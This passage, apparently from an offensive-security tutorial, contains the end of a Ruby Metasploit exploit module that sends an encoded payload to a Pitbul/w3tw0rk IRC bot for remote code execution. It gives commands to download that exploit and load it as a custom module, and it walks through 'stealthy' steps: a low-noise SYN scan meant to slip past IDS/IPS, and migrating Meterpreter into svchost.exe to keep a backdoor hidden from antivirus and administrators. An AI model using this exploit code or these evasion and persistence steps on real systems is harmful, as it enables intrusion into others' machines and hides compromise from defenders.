
begin

read_data = sock.get_once(-1, 1)

while !read_data.nil?

data << read_data

read_data = sock.get_once(-1, 1)

end

rescue ::EOFError, ::Timeout::Error, ::Errno::ETIMEDOUT => e

elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")

end

data

end

def register(sock)

msg = ""

if datastore['IRC_PASSWORD'] && !datastore['IRC_PASSWORD'].empty?

msg << "PASS #{datastore['IRC_PASSWORD']}\r\n"

end

if datastore['NICK'].length > 9

nick = rand_text_alpha(9)

print_error("The nick is longer than 9 characters, using #{nick}")

else

nick = datastore['NICK']

end

msg << "NICK #{nick}\r\n"


msg << "USER #{nick} #{Rex::Socket.source_address(rhost)}

#{rhost} :#{nick}\r\n"

send_msg(sock,msg)

end

def join(sock)

join_msg = "JOIN #{datastore['CHANNEL']}\r\n"

send_msg(sock, join_msg)

end

def w3tw0rk_command(sock)

encoded = payload.encoded

command_msg = "PRIVMSG #{datastore['CHANNEL']} :!bot #{encoded}\r\n"

send_msg(sock, command_msg)

end

def quit(sock)

quit_msg = "QUIT :bye bye\r\n"

sock.put(quit_msg)

end

def exploit

connect

print_status("#{rhost}:#{rport} - Registering with the IRC Server...")

res = register(sock)

if res =~ /463/ || res =~ /464/

print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")

return

end

print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} chan-

nel...")

res = join(sock)

if !res =~ /353/ && !res =~ /366/

print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']}

channel")

return

end

print_status("#{rhost}:#{rport} - Exploiting the IRC bot...")

w3tw0rk_command(sock)

quit(sock)

disconnect

end


end

_________________________________________________snip_______________________________________________

The script above is a structure for writing an exploit for Metasploit. You can add or rewrite the exploit if you want. The

source can be downloaded here: https://www.exploit-db.com/exploits/38302/.

After downloading the source, copy it into the directory with the Metasploit command:

root@sungai : ~# wget https://www.exploit-db.com/exploits/38302/; mv 38302

cupenkz.rb; mv cupenkz.rb ~/.msf4/modules/exploits/

Note:

- wget is the command for downloading the exploit file

- mv is the command for renaming and moving the file

FIGURE 79: DOWNLOAD EXPLOIT AND IMPORT TO METASPLOIT DIRECTORY

After downloading the exploit to be imported, run the command reload_all to reload all settings that have been changed

before.

FIGURE 80: RELOAD ALL NEW MODULE ON METASPLOIT

After reloading all new modules on Metasploit, you can search for module with the command:

msf> search cupenkz

FIGURE 81: SEARCHING CUPENKZ EXPLOIT

There is one exploit named cupenkz, with the description “exploit Pitbul IRC Bot Remote Code Execution.” Now use the

exploit with the command:

msf> use exploit/cupenkz

FIGURE 82: USE EXPLOIT CUPENKZ

It can be seen, after you import the module itself, that indirectly you've made a custom module to be added to Metasploit.


6. Stealthy techniques when using Metasploit. Stealthy techniques are methods by which the attacker installs a backdoor so that targets that have been acquired can be

entered at any time; the attacker can then perform scanning and other techniques in many circumstances where it seems

unimaginable. In this example, the target has IDS/IPS, which is very paranoid, so that when it is done, the IDS/IPS instantly

displays a warning and alerts the attacker. The target also has AV/antirootkit so, when installing a backdoor, it will be

known by admin.

This time I pointed out that the attacker is scanning the target and is not suspicious. However, not all administrators can

bypass, because setting a system depends on whether or not it is paranoid about that setting.

First of all, I run Metasploit with the command:


FIGURE 83: START METASPLOIT

Then use the module auxiliary/scanner/Portscan/syn:

msf> use auxiliary/scanner/portscan/syn


FIGURE 84: USING AUXILIARY/SCANNER/PORTSCAN/SYN

The module option can be seen above; it appears that the attacker can adjust the settings for how many ports will be

scanned and how much timeout is used. It is as if you are knocking on a door: If you knock on the door as much as 100

times, it will be more audible than if you knock on the door 2 times. Likewise, in scanning techniques, if you send multiple

packets as much as 100 times, it will look more suspicious than if you transmit a packet 2 times. Here I set up to do the

scanning of ports 20-30 only, and setting timeout to 200. Use the command

msf auxiliary (syn)> set ports 20-30

msf auxiliary (syn)> set timeout 200

FIGURE 85: SETTING PORT AND TIMEOUT

After setting port and timeout, you must set the IP target, with the command:

msf auxiliary (syn)> set rhosts 192.168.109.1

FIGURE 86: SETTING IP TARGET

Then you can run with the command:

msf auxiliary (syn)> run

FIGURE 87: RUNNING SYN SCAN7

From the picture above, we see that the target has port 22 open. The result of port scanning is short because I did not use

random port scanning and tried to do stealthy scanning


My second example is where, after getting access to a computer target, I put a stealth backdoor into the victim's computer.

The backdoor is installed here using the migrate feature contained in Meterpreter. The feature creates a fictitious process

on the target computer.

Here I use the PS command in Meterpreter when a target has been hacked:

FIGURE 88: PROCESS ON COMPUTER TARGET

The picture above shows all processes on the target computer; after I see all these processes, I use the command:

Meterpreter > run post/windows/manage/migrate

FIGURE 89: MAKE FICTITIOUS PROCESS ON THE TARGET COMPUTER

The picture above shows that the command creates a fictitious process for Meterpreter so the svchost.exe process is ma-

nipulated to run Meterpreter on the target computer. The results are shown below:


FIGURE 90: FICTITIOUS PROCESS RUNNING

Results from the victim's computer that is running a fictitious process show the process PID 1240 running notepad.exe,

where the application is fictitious.